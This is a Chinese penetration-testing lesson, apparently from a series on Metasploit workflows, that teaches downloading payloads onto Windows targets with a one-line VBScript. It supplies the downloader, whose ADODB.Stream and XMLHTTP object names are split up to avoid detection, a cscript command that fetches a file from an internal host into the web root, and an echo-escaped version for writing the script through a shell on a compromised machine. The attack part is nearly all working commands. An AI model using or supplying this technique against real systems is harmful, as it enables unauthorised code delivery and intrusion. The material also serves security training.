第三十七课：vbs一句话下载payload

一次 msf 完整的流程离不开目标机的 payload 下载与执行。而针对不同环境目标，考虑或者选择不同方式的 payload 下载与执行。如 webshell 下，注入点下。smb 下等。而针对不同的实际环境，来做最好的选择。

既然本季开始专门针对 windows 下的 payload 下载讲解，那么就需要考虑到目标机的系统版本，是windows2000，windows 2003，或者是更高的版本如 windows 2016等。

无论是哪个版本的windows系列，都是支持vbs的。

靶机：windows 2003

vbs：

保存downfile.vbs ```visual basic set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2

### 命令行下执行：
```bash
cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txt

往往在实战中，没有上传的方便条件，尤其是目标机是 windows，只有 echo 方式来写入 vbs。

命令行下执行：

echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile
wsh.arguments(1),2 >>downfile.vbs

优点：支持windows全版本系列 缺点：对https不友好

Micropoor

Previous第三十六课：解决vps上ssh掉线 Next第三十八课：certutil一句话下载payload

Last updated 5 years ago

Was this helpful?